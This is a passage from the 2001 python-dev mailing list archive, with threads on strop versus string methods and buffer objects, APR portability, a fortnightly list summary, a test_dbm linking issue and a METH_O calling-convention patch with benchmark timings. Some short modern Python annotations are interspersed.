those other platforms and reduce the Python code even more.


I think shifting Python to a portability library is actually quite an
interesting thought experiment. Enough to mention it and get people
thinking. I think it could be quite handy for the longer term
maintainability.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal@lemburg.com  Thu May 24 15:54:24 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 16:54:24 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org>
Message-ID: <3B0D20A0.3C881F89@lemburg.com>

Greg Stein wrote:
> 
> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> > Greg Stein wrote:
> >...
> > > So... my question is: is there any way that we can retain a generic find()
> > > (and similar functions from the string/strop module) that operates on any
> > > type that implements the buffer API?
> > >
> > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > > implements some standard methods for 8-bit character data (using the buffer
> > > API), which can be mixed into new Python types" That would reduce the burden
> > > for new types.
> >
> > I suppose that in 2.2 we'll be able to build a class/type
> > hierarchy which then provides these possibilities. I haven't
> > followed Guido's latest checkins closely though -- could be that
> > types don't support multiple inheritance.
> 
> No idea either... that's why I asked.
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> You're totally missing the point with that suggestion. It does *not* suffice
> to add them to buffer objects. What about array objects? mmap objects?
> Random Joe Object who implements the buffer interface?

That's the point: you can wrap all those into a buffer object
and then use the buffer object methods to manipulate them. In
that sense, buffer objects provide an adaptor to the underlying
object which implements the needed methods.
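A sketch of that adaptor in Python 3 terms. Python 2's buffer(object[, offset[, size]]) no longer exists, so the hypothetical BufferAdaptor class below uses memoryview to provide the same kind of byte-range window plus a couple of string-style methods. It illustrates the adaptor pattern only; neither Python version ships this class.

```python
import array


class BufferAdaptor:
    """Hypothetical adaptor: wrap any buffer exporter, add string methods."""

    def __init__(self, obj, offset=0, size=None):
        # Flatten to unsigned bytes (no copy) so offset/size count bytes.
        view = memoryview(obj).cast("B")
        end = len(view) if size is None else offset + size
        self._view = view[offset:end]

    def __len__(self):
        return len(self._view)

    def find(self, sub, start=0):
        return self._view.tobytes().find(sub, start)

    def upper(self):
        return self._view.tobytes().upper()


record = array.array("b", b"key=value")
print(BufferAdaptor(record, offset=4).find(b"l"))  # 2
```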
 
> All of those are out of luck.
> 
> With strop, I can pass any of those objects to strop.find(). That function
> has a polymorphic argument.
> 
> In the current arrangement, every object must implement their own .find and
> .upper and .whatever.
> 
> Cheers,
> -g
> 
> --
> Greg Stein, http://www.lyra.org/

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip@pobox.com (Skip Montanaro)  Thu May 24 16:55:23 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 24 May 2001 10:55:23 -0500
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010524060016.D5402@lyra.org>
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
 <20010524013349.Y5402@lyra.org>
 <3B0CE00A.488C8D73@lemburg.com>
 <20010524060016.D5402@lyra.org>
Message-ID: <15117.12011.323759.496982@beluga.mojam.com>

    Greg> With strop, I can pass any of those objects to strop.find(). That
    Greg> function has a polymorphic argument.

Where doesn't strop compile/run?  If it works everywhere, either just rename
it to be the string module (copying any bits from the existing string module
that it doesn't yet have) or rename it something like buffer_funcs.

Skip


From skip@pobox.com (Skip Montanaro)  Thu May 24 16:58:24 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 24 May 2001 10:58:24 -0500
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
References: <20010524055555.B5402@lyra.org>
 <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <15117.12192.114564.111578@beluga.mojam.com>

    >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
    >> 
    >> A lot more than that :-) Pretty much all the Unix variants, including
    >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

    Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
    Michael> VMS, Playstation 2(!),

Not to mention MacOS < X... ;-)

Skip


From mwh@python.net  Thu May 24 17:38:37 2001
From: mwh@python.net (Michael Hudson)
Date: Thu, 24 May 2001 17:38:37 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24
Message-ID: <Pine.LNX.4.30.0105241737010.21946-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 May 10 and May 24 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list@python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration).  All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the eighth summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 322

       |                         [|]
       |                         [|]
    30 |                         [|]
       |                     [|] [|] [|]                     [|]
       |                     [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |     [|]         [|] [|] [|] [|] [|]                 [|]
    20 | [|] [|]         [|] [|] [|] [|] [|]                 [|]
       | [|] [|]         [|] [|] [|] [|] [|]             [|] [|]
       | [|] [|]     [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
    10 | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|]
     0 +-023-025-017-018-028-031-036-032-025-002-015-018-020-032
        Thu 10| Sat 12| Mon 14| Wed 16| Fri 18| Sun 20| Tue 22|
            Fri 11  Sun 13  Tue 15  Thu 17  Sat 19  Mon 21  Wed 23

 Pretty busy fortnight.  The above distribution may be somewhat skewed
 because I changed my subscription address to python-dev and was
 unsubscribed for a while.  Although any impact this had is probably
 countered by ESR and Barry's discussion of "Puffy the Frog"...


    * Type/class *

 Paul Prescod has been keeping an eye on Guido's descr-branch work,
 and posted concerns about when objects will have a __dict__:

  <http://mail.python.org/pipermail/python-dev/2001-May/014694.html>

 Then there was more technical discussion about subclassing builtin
 types and Steven Majewski evangelising prototype-based OO languages
 (though I'm not sure why!).


    * Easy codec access *

 Marc-Andre Lemburg checked in his decode string method patch, and
 some new codecs so you can now do things like:

    >>> "abc".encode('zlib').encode('base64')
    'eJxLTEoGAAJNASc=\n'
    >>> _.decode('base64').decode('zlib')
    'abc'

 There was a small discussion on what other codecs might be handy and
 Guido added quoted-printable to check it was easy.
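In Python 3 the string methods no longer accept bytes-to-bytes codecs, so the same round trip is spelled through the codecs module. A minimal sketch:

```python
import codecs

# Compress, then base64-encode; each step is a bytes-to-bytes codec.
packed = codecs.encode(codecs.encode(b"abc", "zlib"), "base64")
print(packed)

# Undo the steps in reverse order.
unpacked = codecs.decode(codecs.decode(packed, "base64"), "zlib")
print(unpacked)  # b'abc'
```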


    * Performance *

 The big discussion(s) on python-dev over the past fourteen days has
 centred on performance, especially on that of comparisons and the
 related area of dict performance.  It all started with Tim Peters
 running a simple test program on 2.0, 2.1 and current CVS:

  <http://mail.python.org/pipermail/python-dev/2001-May/014781.html>

 The discussion had an unusual <wink> flavour for one about
 performance: a concentration on measuring performance numbers and
 making sure that the optimizations being discussed actually improved
 these numbers.  This is hard; everyone wants to speed the "typical
 Python app" but of course there is no such thing; people have been
 using, amongst others, pystone, pybench and the test suite, none of
 which are particularly good candidates...
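As an illustration of the measure-first approach (not a reproduction of Tim's test program, which isn't shown here), a micro-benchmark with the standard timeit module might look like this. The statements timed are arbitrary examples.

```python
import timeit

# Build the strings at run time so a and b are equal but distinct objects;
# identical literals could be folded into one object and compare by identity.
SETUP = "a = ''.join(['spam'] * 10); b = ''.join(['spam'] * 10); d = {a: 1}"
NUMBER = 10_000

results = {}
for label, stmt in [("str ==", "a == b"), ("dict lookup", "d[b]")]:
    # Best of several repeats is less sensitive to background noise.
    best = min(timeit.repeat(stmt, setup=SETUP, repeat=5, number=NUMBER))
    results[label] = best / NUMBER
    print(f"{label:12s} {results[label] * 1e9:8.1f} ns per operation")
```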

 Tim posted the distribution of sizes of dicts in a run of the test
 suite:

  <http://mail.python.org/pipermail/python-dev/2001-May/014890.html>

 which showed that small dicts are overwhelmingly the commonest.  Marc
 piped up with an old optimization idea of his:

  <http://mail.python.org/pipermail/python-dev/2001-May/014891.html>

 He posted a patch to sourceforge, Tim rewrote it and checked it in,
 so dicts should be a little faster in 2.2.

 But as I said, the discussion was kicked off by the performance of
 comparisons, especially strings.  Martin von Loewis posted some
 statistics from an instrumented interpreter:

  <http://mail.python.org/pipermail/python-dev/2001-May/014808.html>

 The issue is that the rich comparisons of Python 2.1 have added a
 layer of complexity to the comparisons code.  Although the rich
 comparisons (might) provide an opportunity for faster code in some
 circumstances, code that still uses old-style comparisons can and
 does take a hit.  Strings still use the old-style comparisons and are
 compared a *lot* (especially in dicts), so it seems "upgrading" them
 to rich comparisons should be a win and Marc posted a patch to sf
 that does this.

 Marc also managed to promise <wink> to make a concerted effort to
 find speed optimizations in the next few months:

  <http://mail.python.org/pipermail/python-dev/2001-May/014928.html>

 Finally, in a coda Jeremy noticed that Python spends an alarming
 amount of time decoding those "Oi|s#" strings that get passed to
 PyArg_ParseTuple:

  <http://mail.python.org/pipermail/python-dev/2001-May/014911.html>

 and Tim pointed out that optimizing "O" might be a win:

  <http://mail.python.org/pipermail/python-dev/2001-May/014924.html>

    * FP vs. tutorial *

 Tim pointed out that the tutorial currently contains examples of
 floating point output that is platform dependent, and that this is
 bad.  He proposed changing the tutorial to only use fractions that
 can be exactly represented as floats, and adding a discussion
 (possibly in an appendix) of the reasons why

    >>> 0.1
    0.10000000000000001

 is not broken.  There was some debate about how detailed the
 explanation should be; the point was made that it's not really
 important to explain precisely *why* this happens, but it suffices to
 convince the newbie that floating point is more complicated than he or
 she thinks.  Let's hope that suitable text is composed soon, and that
 people actually read it ... there have been two "floating point is
 broken" bug reports on sourceforge in just the last week.
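 A minimal Python 3 sketch (not from the thread) of the distinction the
 tutorial text needs: 0.1 has no exact binary representation, while
 fractions whose denominator is a power of two do.  Formatting with 17
 significant digits reproduces the 2001-era output quoted above; Python
 2.7 and 3.1+ print the shortest repr that round-trips, so they show a
 plain 0.1.

```python
from decimal import Decimal
from fractions import Fraction

# 17 significant digits always round-trip an IEEE-754 double;
# this is the output the tutorial showed in 2001.
seventeen = "%.17g" % 0.1           # '0.10000000000000001'

# The exact binary value actually stored for the literal 0.1.
exact = Decimal(0.1)                # 0.1000000000000000055511151231257827...

# Fractions with a power-of-two denominator are stored exactly,
# so arithmetic on them behaves "as expected"; 0.1 and 0.2 are not.
exact_ok = (0.5 + 0.25 == 0.75)     # True
inexact = (0.1 + 0.2 == 0.3)        # False

print(seventeen, exact_ok, inexact)
print(Fraction(0.1) == Fraction(1, 10))   # False: 0.1 is only approximated
```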


    * unifying os.rename semantics across platforms *

 Skip pointed out that os.rename behaves differently on Posix and
 Windows platforms when the destination file exists:

  <http://mail.python.org/pipermail/python-dev/2001-May/014957.html>

 on Posix the destination is silently replaced in an atomic operation,
 whereas on Windows an exception is raised.  Skip proposed enforcing
 Posix semantics everywhere, but this has two problems: (a) it's
 backwards incompatible, and (b) it's impossible (you can't avoid the
 race condition on Windows).  So maybe we'll just settle for better
 documentation.
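 Later Python versions (3.3 and up) added os.replace(), which gives the
 Posix-style overwrite on both Posix and Windows (atomicity on Windows
 is a separate question, in line with the race condition mentioned
 above).  A small sketch with made-up file names:

```python
import os
import tempfile

with tempfile.TemporaryDirectory() as d:
    src = os.path.join(d, "new.txt")   # illustrative file names
    dst = os.path.join(d, "old.txt")
    with open(src, "w") as f:
        f.write("new contents")
    with open(dst, "w") as f:
        f.write("old contents")

    # os.rename(src, dst) would overwrite here on Posix but raise on
    # Windows; os.replace() overwrites an existing file on both.
    os.replace(src, dst)

    with open(dst) as f:
        result = f.read()
    src_gone = not os.path.exists(src)

print(result, src_gone)
```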


    * Python 2.1.1 *

 Thomas Wouters started back-porting bug fixes to the 2.1-maint branch
 in preparation for a 2.1.1 release.  There are as yet no firm (or
 even vague) plans about release dates.


    * Daily Python-URL on your Palm *

 Marc-Andre Lemburg announced that you can now read Pythonware's Daily
 Python-URL on your Palm Pilot as an AvantGo channel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014983.html>

Cheers,
M.


From gstein@lyra.org  Thu May 24 20:45:18 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 12:45:18 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <20010524124518.N5402@lyra.org>

On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote:
>...
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

That would certainly be a valid solution. And at the C level, we could share
functions between PyBufferObject and PyStringObject.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein@lyra.org  Thu May 24 21:07:43 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 13:07:43 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain> <15117.12192.114564.111578@beluga.mojam.com>
Message-ID: <20010524130743.O5402@lyra.org>

On Thu, May 24, 2001 at 10:58:24AM -0500, skip@pobox.com wrote:
> 
>     >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>     >> 
>     >> A lot more than that :-) Pretty much all the Unix variants, including
>     >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
>     Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
>     Michael> VMS, Playstation 2(!),
> 
> Not to mention MacOS < X... ;-)

As I mentioned, MacOS X is already there. MacOS Classic is not.

But the presence of a portability library such as APR does not exclude the
use of direct platform hooks where/when necessary. For a bunch of stuff, you
use APR [to reduce complexity/maintenance]. For the rest, you go native just
like today.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From skip@pobox.com (Skip Montanaro)  Thu May 24 22:15:48 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 24 May 2001 16:15:48 -0500
Subject: [Python-Dev] Odd message from test_dbm
Message-ID: <15117.31236.804746.160037@beluga.mojam.com>

I just noticed this message when running make test:

    test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
them...

Anybody else seen this?  

Skip


From thomas@xs4all.net  Thu May 24 22:42:58 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 23:42:58 +0200
Subject: [Python-Dev] Odd message from test_dbm
In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500
References: <15117.31236.804746.160037@beluga.mojam.com>
Message-ID: <20010524234258.I690@xs4all.nl>

On Thu, May 24, 2001 at 04:15:48PM -0500, skip@pobox.com wrote:

> I just noticed this message when running make test:

>     test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

> I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
> libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
> them...

The problem is that the dbmmodule isn't linked to the right library. Debian
has a similar (if not the same) problem. setup.py doesn't try hard enough to
figure out the right library to link with; it checks for libndbm, but not
libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.)
I *think* all it needs to do is check for libdbm as well as libndbm, but
this might pick up old/incompatible libraries on some platforms, and it
might still require fiddling of include paths on others. I seem to recall
you had to include either /usr/include/db1/ndbm.h (to use libdbm) or
/usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm
'emulation') but I gave up in frustration trying to figure out the
difference :P

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From greg@cosc.canterbury.ac.nz  Fri May 25 03:45:01 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 25 May 2001 14:45:01 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal@lemburg.com>:

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

Aren't buffer objects as they're currently implemented
inherently dangerous?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From martin@loewis.home.cs.tu-berlin.de  Fri May 25 07:00:47 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 08:00:47 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>

> Special-casing the snot out of "O" looks like a winner <wink>:

I have a patch on SF that takes this approach:

http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470

The idea is that functions can be declared as METH_O, instead of
METH_VARARGS. I also offer METH_l, but this is currently not used. The
approach could be extended to other signatures, e.g. METH_O_opt_O
(i.e. "O|O").  Some signatures cannot be changed into special-calls,
e.g. "O!", or "ll|l".

In the PyXML test suite, "O" is indeed the most frequent case (72%),
and it is primarily triggered through len (26%), append (24%), and ord
(6%). These are the only functions that make use of the new calling
conventions at the moment. If you look at the patch, you'll see that
it is quite easy to change a method to use a different calling
convention (basically just remove the PyArg_ParseTuple call).
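A toy Python model (not CPython's C code) of the difference: under
METH_VARARGS the callee receives an argument tuple and decodes a format
string on every call, while under METH_O the caller only checks for
exactly one argument and passes it straight through.  The flag names
mirror the patch; parse_tuple and call_builtin are hypothetical
stand-ins for PyArg_ParseTuple and the interpreter's call path.

```python
METH_VARARGS, METH_O = "varargs", "o"

def parse_tuple(args, fmt):
    """Tiny stand-in for PyArg_ParseTuple: supports only 'O' codes."""
    codes = fmt.split(":")[0]            # drop the ":funcname" suffix
    if any(c != "O" for c in codes):
        raise NotImplementedError("toy parser handles only 'O'")
    if len(args) != len(codes):
        raise TypeError("expected %d argument(s), got %d"
                        % (len(codes), len(args)))
    return args

def call_builtin(func, flags, self, args):
    if flags == METH_O:
        # Fast path: no format string to decode, just an arity check.
        if len(args) != 1:
            raise TypeError("expected exactly one argument")
        return func(self, args[0])
    # Slow path: the callee gets the whole tuple and parses it itself.
    return func(self, args)

# The same "append" written both ways.
def append_varargs(lst, args):
    (item,) = parse_tuple(args, "O:append")
    lst.append(item)

def append_o(lst, item):                 # no parsing code at all
    lst.append(item)
```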

To measure the patch, I use the script

from time import clock

indices = [1] * 20000
indices1 = indices*100
r1 = [1]*60

def doit(case):
    s = clock()
    i = 0
    if case == 0:
        f = ord
        for i in indices1:
            f("o")
    elif case == 1:
        for i in indices:
            l = []
            f = l.append
            for i in r1:
                f(i)
    elif case == 2:
        f = len
        for i in indices1:
            f("o")
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2))

Without the patch, (almost) stock CVS gives

2.190 1.800 2.240
2.200 1.800 2.220
2.200 1.800 2.230
2.220 1.800 2.220
2.200 1.800 2.220
2.200 1.790 2.240
2.200 1.790 2.230
2.200 1.800 2.220
2.200 1.800 2.240
2.200 1.790 2.230

With the patch, I get

1.440 1.330 1.460
1.420 1.350 1.440
1.430 1.340 1.430
1.510 1.350 1.460
1.440 1.360 1.470
1.460 1.330 1.450
1.430 1.330 1.420
1.440 1.340 1.440
1.430 1.340 1.430
1.410 1.340 1.450

So the speed-up is roughly 30% to 50%, depending on how much work the
function has to do.
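As a cross-check on that summary, a short script (not part of the
original message) that takes the ten runs posted above, uses the median
of each column, and reports both the throughput ratio and the time
saved.  It gives roughly 1.53x for ord, 1.34x for append and 1.54x for
len, i.e. about a third less time for ord and len and about a quarter
less for append, consistent with the "30% to 50%" estimate.

```python
from statistics import median

# Timings copied from the two tables above; columns are ord, append, len.
before = [
    (2.190, 1.800, 2.240), (2.200, 1.800, 2.220), (2.200, 1.800, 2.230),
    (2.220, 1.800, 2.220), (2.200, 1.800, 2.220), (2.200, 1.790, 2.240),
    (2.200, 1.790, 2.230), (2.200, 1.800, 2.220), (2.200, 1.800, 2.240),
    (2.200, 1.790, 2.230),
]
after = [
    (1.440, 1.330, 1.460), (1.420, 1.350, 1.440), (1.430, 1.340, 1.430),
    (1.510, 1.350, 1.460), (1.440, 1.360, 1.470), (1.460, 1.330, 1.450),
    (1.430, 1.330, 1.420), (1.440, 1.340, 1.440), (1.430, 1.340, 1.430),
    (1.410, 1.340, 1.450),
]

results = {}
for col, name in enumerate(("ord", "append", "len")):
    t0 = median(row[col] for row in before)
    t1 = median(row[col] for row in after)
    results[name] = (t0 / t1, 1 - t1 / t0)   # (speed-up ratio, time saved)
    print("%-6s %.3f -> %.3f  %.2fx faster, %.0f%% less time"
          % (name, t0, t1, t0 / t1, 100 * (1 - t1 / t0)))
```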

Please let me know what you think.

Regards,
Martin


From mal@lemburg.com  Fri May 25 09:23:10 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:23:10 +0200
Subject: [Python-Dev] strop vs. string
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>
Message-ID: <3B0E166E.581816AA@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com>:
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> Aren't buffer objects as they're currently implemented
> inherently dangerous?

Why should they be ?

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Fri May 25 09:56:12 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:56:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <3B0E1E2C.4BC121B5@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Special-casing the snot out of "O" looks like a winner <wink>:
> 
> I have a patch on SF that takes this approach:
> 
> http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470
> 
> The idea is that functions can be declared as METH_O, instead of
> METH_VARARGS. I also offer METH_l, but this is currently not used. The
> approach could be extended to other signatures, e.g. METH_O_opt_O
> (i.e. "O|O").  Some signatures cannot be changed into special-calls,
> e.g. "O!", or "ll|l".
> 
> [benchmark]
> So the speed-up is roughly 30% to 50%, depending on how much work the
> function has to do.
> 
> Please let me know what you think.

Great idea, Martin.

One suggestion though: I would change the way the
function is "declared" in the method list. You currently use:

 {"append", (PyCFunction)listappend,  METH_O, append_doc},

Now this would be more flexible if you would implement a scheme
which lets us put the parser string into the method list. The
call mechanism could then easily figure out how to call the
method and it would also be more easily extensible:

 {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

This would then (just like in your patch) call the listappend
function with the parser arguments inlined into the C call:

 listappend(self, arg0)

A parser marker "OO" would then call a method like this:

 method(self, arg0, arg1)

and so on.

This approach costs a little more (the string compare), but
should provide a more direct way of converting existing
functions to the new convention (just copy&paste the PyArg_ParseTuple()
argument) and also allows implementing a generic scheme which
then again relies on PyArg_ParseTuple() to do the argument
parsing, e.g. "is#" could be implemented as:

PyObject *method(PyObject *self, int arg0, char *arg1, int *arg1_len)

For optional arguments we'd need some convention which then
lets the called function add the default value as needed.
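A hypothetical Python model of the METH_DIRECT idea: the method table
carries the format string, and the call machinery uses it to spread the
arguments into a direct call.  It also makes the limitation visible:
only a fixed set of formats can be supported, and an unsupported one is
discovered when the table entry is set up at run time.  The names
(SUPPORTED, make_caller) are illustrative, not an existing API.

```python
# Formats this toy dispatcher knows how to spread into a direct call.
# In C each one needs its own hand-written function-pointer cast,
# which is why only a fixed set can ever be supported.
SUPPORTED = {"O": 1, "OO": 2, "OOO": 3}

def make_caller(name, func, fmt):
    """Build a caller for a table entry (name, func, METH_DIRECT, fmt)."""
    if fmt not in SUPPORTED:
        # Detected at run time, when the table is processed.
        raise ValueError("%s: unsupported direct-call format %r" % (name, fmt))
    nargs = SUPPORTED[fmt]

    def call(self, *args):
        if len(args) != nargs:
            raise TypeError("%s() takes exactly %d argument(s) (%d given)"
                            % (name, nargs, len(args)))
        return func(self, *args)        # method(self, arg0, arg1, ...)
    return call
```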

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From ping@lfw.org  Fri May 25 11:56:33 2001
From: ping@lfw.org (Ka-Ping Yee)
Date: Fri, 25 May 2001 05:56:33 -0500 (CDT)
Subject: [Python-Dev] May 25 is Towel Day (towelday.org)
Message-ID: <Pine.LNX.4.10.10105250556050.19548-100000@server1.lfw.org>

If you have enjoyed Douglas Adams' works, please consider carrying
or wearing a towel with you everywhere today, May 25, as a tribute
and in his memory.

For more about Towel Day, visit http://www.towelday.org/.

My apologies for being off-topic.


-- ?!ng


From gstein@lyra.org  Fri May 25 12:59:23 2001
From: gstein@lyra.org (Greg Stein)
Date: Fri, 25 May 2001 04:59:23 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com>
Message-ID: <20010525045923.C12056@lyra.org>

On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote:
> Greg Ewing wrote:
> > "M.-A. Lemburg" <mal@lemburg.com>:
> > 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> > 
> > Aren't buffer objects as they're currently implemented
> > inherently dangerous?
> 
> Why should they be ?

The buffer object caches the pointer from getreadbuffer and friends. If the
target object changes that pointer (internally), then the buffer object's
value is stale.

But that is a bug fix; it is independent of the discussion at hand.
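A toy Python model (hypothetical classes, not the C implementation) of
the bug described above: a view that grabs the owner's storage once and
keeps using it goes stale when the owner reallocates, whereas a view
that asks the owner for its storage on every access stays correct.  In
C the cached pointer can point at freed memory, which is worse than
merely old data.

```python
class Owner:
    """Stands in for an object exporting the buffer API (e.g. an array)."""
    def __init__(self, data):
        self._storage = bytearray(data)

    def get_read_buffer(self):
        return self._storage

    def grow(self, extra):
        # Like a C realloc() that moves the block: brand-new storage.
        self._storage = self._storage + bytearray(extra)


class CachingView:
    """Mimics the buggy behaviour: caches the buffer at creation time."""
    def __init__(self, owner):
        self._cached = owner.get_read_buffer()

    def contents(self):
        return bytes(self._cached)


class RefetchingView:
    """The fix: ask the owner for its current buffer on every access."""
    def __init__(self, owner):
        self._owner = owner

    def contents(self):
        return bytes(self._owner.get_read_buffer())
```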

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From Barrett@stsci.edu  Fri May 25 14:21:20 2001
From: Barrett@stsci.edu (Paul Barrett)
Date: Fri, 25 May 2001 09:21:20 -0400
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <3B0E5C50.6E365F69@STScI.Edu>

"M.-A. Lemburg" wrote:
> 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
